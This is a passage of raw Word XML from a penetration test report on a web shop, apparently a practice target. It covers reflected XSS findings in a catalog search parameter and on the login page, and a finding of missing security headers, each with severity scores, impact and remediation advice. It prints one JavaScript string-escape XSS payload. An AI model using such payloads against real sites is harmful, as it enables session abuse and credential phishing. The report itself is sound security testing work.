        <w:t>Direct injection of &lt;&gt; characters confirmed they were encoded and rendered inert. However, testing other special characters showed inconsistent encoding, indicating the filter is incomple</w:t>
      </w:r>
      <w:r>
        <w:t>te rather than context-aware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4A2C8" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By prefixing a backslash to escape the enclosing quote (\'; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)//), the payload broke out of the JavaScript string literal the input was reflected into, successfully executing the injected script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D5AC1F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D182CA5" wp14:editId="53759A92">
            <wp:extent cx="5334000" cy="2867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867025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38F674" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5 — Reflected XSS confirmed via a JavaScript-context escape payload in the catalog </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>searchTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A53AE23" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174C4112" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>As with the blog search finding, this allows script execution in the victim's browser session, which can be used for session-riding, UI r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">edress/phishing, or as a pivot for further client-side exploitation, even though </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> limits direct cookie theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63690689" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C9C0C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Encode output according to the specific context it is placed in — HTML-encoding alone is insufficient for data reflected into </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript string literals, which requires JavaScript-specific escaping (or, preferably, avoiding server-side reflection into inline script blocks entirely in favor of passing data via safe DOM APIs or data attributes). Combine with a strict CSP that disal</w:t>
      </w:r>
      <w:r>
        <w:t>lows inline script execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6B4FDF" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E42436" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP XSS Prevention Cheat Sheet — Rule #3 (JS Escaping)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="034DEB63" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>PortSwigger</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t xml:space="preserve"> — Reflected XSS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F4BD82E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:before="500" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>F-06: Reflected Cross-Site Scripting — Login Parameter</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2200" w:type="dxa"/>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514271" w14:paraId="5AA8CF53" w14:textId="77777777" w:rsidTr="00F50484">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B45309"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7BB144C9" w14:textId="1F92943C" w:rsidR="00514271" w:rsidRDefault="00F50484">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19268A2E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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7446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="17654053"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768FD72E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">CVSS 3.1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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073F0310" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7 (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="5FAA0870"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22617CE2" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE</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11009D95" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="1DBB8087"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19128A14" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL</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7747EF7D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://ginandjuice.shop/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D3E8718" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D18B92" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE43070" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A parameter on the login page is reflected into the response without full output encoding, allowing a limited reflected XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload to be triggered under specific conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C230EB4" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F7FD4F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testing of login page parameters identified a reflection point where crafted input was rendered without complete sanitization, allowing execution of a proof-of-concept script payload. Exploitability requires specific conditions and user interaction, which </w:t>
      </w:r>
      <w:r>
        <w:t>lowers the practical severity relative to the other reflected XSS findings in this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBDAB73" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61B7AAC7" wp14:editId="5E1F8908">
            <wp:extent cx="5334000" cy="2324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324100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6715E4" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 6 — Reflected XSS proof-of-concept on the login endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBFD818" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD1EBC1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>While constrained by higher attack complexity, this issue could still be used in a targeted phishing campaign against users of the login page, e.g., to overlay a fake credential-harvesting form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E3F8D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8E867" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply the same context-aware output encoding and </w:t>
      </w:r>
      <w:r>
        <w:t>CSP controls recommended for the other XSS findings in this report to the login page's reflected parameters, and treat all login-page inputs as untrusted regardless of perceived low exploitability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67288BA3" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1981CC5A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP XSS Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23894DE5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>PortSwigger</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t xml:space="preserve"> — Cross-Site Scripting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="657E22AE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:before="500" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>F-07: Missing Security Headers</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2200" w:type="dxa"/>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514271" w14:paraId="6F7D4D1F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="374151"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33055AE8" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>INFORMATIONAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35048C1C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="2"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7446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="5FAA5E07"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0A7FCCBE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">CVSS 3.1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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63DE3BD6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="07CAD1D7"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25E611DB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE</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0647B3D6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-693: Protection Mechanism Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="563277E6"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3F4F6"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0AE0E852" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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713D42A4" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://ginandjuice.shop/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="692EA92A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1C9EB4" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B012F30" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP responses from the application do not consistently set recommended security headers, including Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, and Strict-Transport-Security. While not directly exploitable on their own, these missing </w:t>
      </w:r>
      <w:r>
        <w:t>headers remove important defense-in-depth layers that would otherwise reduce the impact of the XSS and template-injection findings above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C2F70" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62349DD9" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Response headers were captured and reviewed across multiple endpoints. No Content-Security-Policy was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> present to restrict script execution sources, no X-Frame-Options / frame-ancestors directive was present to prevent clickjacking, and no X-Content-Type-Options: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nosniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> header was present to prevent MIME-type sniffing attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17987696" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AD8D198" wp14:editId="6AED9E51">
            <wp:extent cx="53340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743200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0A096B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 7 — HTTP response h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>eaders showing the absence of recommended security headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F183F29" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703BFA4F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The absence of these headers does not constitute a standalone vulnerability but meaningfully increases the impact of the XSS and CSTI findings elsewhere in this report (no CSP to contain script execution) and leaves the application exposed to clickjacking </w:t>
      </w:r>
      <w:r>
        <w:t>and MIME-sniffing-based attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE908D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC41C6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Configure the web server or application framework to send a strict Content-Security-Policy tailored to the application's actual script/style/resource origins, set X-Frame-Options: DENY (or frame-ancestors 'none'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in CSP), set X-Content-Type-Options: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nosniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
